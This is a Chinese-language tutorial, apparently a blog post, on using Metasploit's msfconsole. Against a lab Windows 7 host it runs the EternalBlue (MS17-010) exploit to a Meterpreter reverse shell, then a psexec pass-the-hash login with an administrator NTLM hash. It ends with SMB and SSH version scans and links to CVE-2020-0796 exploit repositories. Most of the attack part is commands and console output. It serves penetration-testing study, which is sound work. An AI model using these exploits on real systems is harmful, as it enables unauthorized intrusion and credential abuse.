msfconsole 攻击、辅助1
msf演示
渗透模块(module)
提供的各种功能函数 (exploit ,auxiliary 等)
auxiliary 辅助脚本 (扫描,嗅探,破解,注入,渗透挖掘) ---> 踩点 ,观察
exploits 漏洞利用(各种攻击脚本,) ---> 根据踩点的信息,打开大门
nops 绕过入侵检测设备(IDS) ---> 打开大门的过程中遇到门卫的话,伪装绕过。
payloads 攻击载荷(在大门内搞事情) ---> 打开大门。
evasion 制作攻击载荷 --> 制作潜伏者,根据不同的系统,不同语言
encoders 编码,加密 (免杀) --> 对潜伏者 伪装,欺骗大门里的警卫。
post 指令信息 --> 提升潜伏者的在大门里的权限 和活动范围。
data api接口 --> 自己编写程序调用msf的功能的接口
plugins 插件
scpipts 脚本
tools 零散的工具
攻击载荷(payload)
相对于 server端 和 client端 ,
比如对于 zabbix 来说, zabbix_client收集系统信息,获取系统权限,开通服务端口等等,返回给server端。 client本身就是攻击载荷。
我方期望目标系统在被渗透攻击后执行的代码,
溢出代码(shellcode)
主动式访问
作为攻击载荷中的一种,功能是提供一个可以进行交互的窗口。
监听器(listener)
被动式接收客户端的访问。
模拟攻击过程 ms17-010
启动攻击工具msfconsole
# 启动msf控制台 ---> “进入武器库”
(root?kali)-[/usr/share/metasploit-framework/modules]
└─# msfconsole
在渗透层级,通过 show options 查看命令帮助
# 根据公开的漏洞编号, 搜索针对该漏洞的渗透工具 ---- “根据面对的假想敌,选择武器,比如对方为坦克重装集群”
# 返回 匹配的模块名称 公布时间 等级 检查 描述 --- “ 我根据敌情,匹配我方武器清单, 陆航团,歼击机大队,榴弹营等等选择”
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
# 选择渗透工具- ----> "由指挥官 选择 使用use 编号"
use 0
# 进入工具的console # “ 选择武器,payload ,确定攻击目录,发起攻击”
show options
# 显示全局选项或一个或多个模块的选项
# 每个选项中名称 当前配置 required要求 描述
```
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Sta
ndard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standar
d 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.9 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
```
# 从module payload 中分析,,主要有以下几点
# 1、本机 IP 端口号 退出命令
# 2、远程主机 IP 端口号 ,提示信息 攻击目标必须符合的架构和系统的版本
set rhosts 10.0.0.136
# 设置远程主机IP
# 攻击脚本命令
1、 check 检查目标主机是否可以攻击
2、 recheck 重新检查目标主机是否可以攻击
3、 reload 重新加载模块
4、 rcheck 重新加载模块,检查目标主机是否可以攻击
1、run 发起攻击
2、exploit 发起尝试攻击
3、rexploit 重新加载模块,发起攻击
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] 10.0.0.136:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.0.136:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.0.0.136:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.0.136:445 - The target is vulnerable.
[*] 10.0.0.136:445 - Connecting to target for exploitation.
[+] 10.0.0.136:445 - Connection established for exploitation.
[+] 10.0.0.136:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.0.136:445 - CORE raw buffer dump (38 bytes)
[*] 10.0.0.136:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.0.0.136:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 10.0.0.136:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.0.0.136:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.0.136:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.0.136:445 - Sending all but last fragment of exploit packet
[*] 10.0.0.136:445 - Starting non-paged pool grooming
[+] 10.0.0.136:445 - Sending SMBv2 buffers
[+] 10.0.0.136:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.0.136:445 - Sending final SMBv2 buffers.
[*] 10.0.0.136:445 - Sending last fragment of exploit packet!
[*] 10.0.0.136:445 - Receiving response from exploit packet
[+] 10.0.0.136:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.0.136:445 - Sending egg to corrupted connection.
[*] 10.0.0.136:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.0.0.136
[+] 10.0.0.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.0.0.9:4444 -> 10.0.0.136:49218 ) at 2022-06-07 11:26:55 +0800
meterpreter >
meterpreter > quit # 退出
# 已完成主机的渗透
exploit/windows/smb/psexec 使用用户密码哈希值
使用不同的渗透脚本,获取的系统权限不同,用户的密码只能获取到密文
# 选择渗透工具
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
# 设置攻击参数
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.0.0.136 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Meta
sploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5 no The password for the specified username
e9cba88547376818d4
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write
folder share
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.9 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
# 开始渗透
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] 10.0.0.136:445 - Connecting to the server...
[*] 10.0.0.136:445 - Authenticating to 10.0.0.136:445 as user 'administrator'...
[*] 10.0.0.136:445 - Selecting PowerShell target
[*] 10.0.0.136:445 - Executing the payload...
[+] 10.0.0.136:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.0.0.136
[*] Meterpreter session 9 opened (10.0.0.9:4444 -> 10.0.0.136:54635 ) at 2022-06-09 16:07:16 +0800
meterpreter > # 完成渗透
msfconsole 辅助功能
扫描工具 不是特别的强大,一般使用 系统扫描 web扫描 专用的工具 nessus 和awvs 天境 极光等等
在信息收集的时候 也可以作为参考
whois 命令
nmap 命令
syn扫描
tcp扫描
icmp等等
重点是扫描的功能
smb版本
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.0.136:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:2d 3h 9m 35s) }) (authentication domain:123-PC)
[+] 10.0.0.136:445 - Host is running Windows 7 Ultimate SP1 (build:7601) (name:123-PC) (workgroup:WORKGROUP)
ssh版本
msf6 auxiliary(scanner/ssh/ssh_version) > run
[+] 10.0.0.1:59783 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
ftp版本
CVE-2020-0796 永恒之蓝2.0
Windows 10 Versions 1903 and 1909
https://github.com/ly4k/SMBGhost # 扫描检测是否存在漏洞
https://github.com/danigargu/CVE-2020-0796 # 获取shell
https://github.com/ZecOps/CVE-2020-0796-RCE-POC # 获取
浙公网安备 33010602011771号